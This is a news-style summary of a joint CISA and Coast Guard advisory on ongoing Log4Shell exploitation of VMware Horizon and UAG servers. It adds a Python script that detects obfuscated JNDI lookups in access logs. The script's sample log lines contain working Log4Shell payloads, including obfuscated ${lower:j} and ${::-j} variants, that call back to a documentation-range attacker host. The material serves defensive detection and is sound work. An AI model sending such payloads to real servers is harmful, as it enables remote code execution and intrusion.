The Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) have released a joint advisory warning that VMware Horizon and Unified Access Gateway (UAG) servers are still being actively exploited through the Log4Shell vulnerability.
The vulnerability was first reported in November 2021 and saw widespread exploitation by independent and state-sponsored threat actors by December. While VMware has since patched the vulnerability, unpatched servers continue to give attackers initial access to organisations that have not yet deployed the fixes.
VMware's fixes became available in December 2021, and exploitation in the wild was confirmed on December 10. According to the advisory, since December 2021 multiple unpatched, public-facing VMware Horizon and UAG servers have been exploited by different threat actor groups to obtain initial access.
Log4j is maintained by the Apache Software Foundation. The open-source logging library is used by many software vendors, including VMware, Cisco, IBM and Oracle. The vulnerability itself, tracked as CVE-2021-44228, is difficult to remediate fully because the library is embedded in so many products and services: the fix has to be applied not just by Apache but by every vendor, device manufacturer and end-user organisation that ships or runs affected software.
While early exploitation was largely used to deploy crypto-mining malware (cryptojackers), investigations carried out by CISA and CGCYBER on victim networks show that threat actors are using the vulnerability for far worse. In one confirmed attack, the attackers moved laterally inside the network, gained access to a disaster recovery network, and collected and exfiltrated sensitive data.
The advisory also contains an analysis of the investigations carried out on two victim networks, as well as incident response and mitigation steps. If a compromise is detected, CISA and CGCYBER recommend the following actions:
- Immediately quarantine impacted systems.
- Collect and review relevant logs, data and other related files and artefacts.
- Get support from a third-party incident response organisation.
- Report the incident to CISA.
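The log review step above is where most teams start, and a literal search for "${jndi:" misses the obfuscated Log4Shell payloads that attackers used against public-facing servers. The script below is an added example, not part of the advisory or of any VMware or CISA tooling: it resolves the nested lookup tricks that Log4j itself evaluates before the JNDI lookup fires (the lower/upper lookups and the "${x:-default}" default-value syntax), then flags any line that still contains a JNDI lookup. The log lines are constructed for the example and the IP addresses are documentation ranges; the function and class names are the example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample web server log lines for the example (not from the advisory).
# Lines 1-3 carry Log4Shell-style JNDI lookups, two of them obfuscated; 4-5 are benign.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [12/Dec/2021:10:01:22 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [12/Dec/2021:10:02:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/b}"',
    '203.0.113.12 - - [12/Dec/2021:10:03:40 +0000] '
    '"GET /portal/?q=${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/c} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.20 - - [12/Dec/2021:10:04:10 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [12/Dec/2021:10:05:55 +0000] "POST /broker/xml HTTP/1.1" 200 128 "-" "VMware-client/8.0"',
]

# Obfuscation forms Log4j resolves before the inner JNDI lookup runs:
#   ${lower:j} / ${upper:j}  -> j        (case lookups)
#   ${::-j} / ${env:NOPE:-j} -> j        (default-value syntax, lookup name is empty or unknown)
# Only innermost lookups (no "${" inside) are matched, so the loop below unwraps nesting.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalisation a JNDI lookup looks like ${jndi:<scheme>:<target>}.
_JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):([^}]*)\}")
_SOURCE_IP = re.compile(r"^(\S+)")


def normalise_lookups(text: str) -> str:
    """Collapse nested Log4j lookups until the text stops changing, then lower-case it."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(r"\1", text)
        text = _DEFAULT_VALUE.sub(r"\1", text)
    return text.lower()


@dataclass
class Finding:
    line_no: int
    source_ip: str
    scheme: str   # ldap, rmi, dns, ... or "unknown" when a lookup could not be fully resolved
    target: str


def scan_log_lines(lines):
    """Return one Finding per log line that carries a JNDI lookup, obfuscated or not."""
    findings = []
    for number, line in enumerate(lines, start=1):
        resolved = normalise_lookups(line)
        ip_match = _SOURCE_IP.match(line)
        source_ip = ip_match.group(1) if ip_match else "?"
        match = _JNDI_LOOKUP.search(resolved)
        if match:
            findings.append(Finding(number, source_ip, match.group(1), match.group(2)))
        elif "${" in resolved and "jndi" in resolved:
            # A lookup survived normalisation in a form this example does not unwrap;
            # still worth an analyst's eyes rather than silently dropping it.
            findings.append(Finding(number, source_ip, "unknown", resolved))
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: {f.source_ip} -> {f.scheme} {f.target}")
```

Run it against the access logs of the Horizon or UAG front end (or any reverse proxy in front of it); the source IPs and callback targets it reports are the starting point for the quarantine and log collection steps above. The hit list is a triage aid, not proof of compromise: a request carrying a lookup only confirms an attempt, and outbound connections from the server to the reported target are what distinguish a successful exploit.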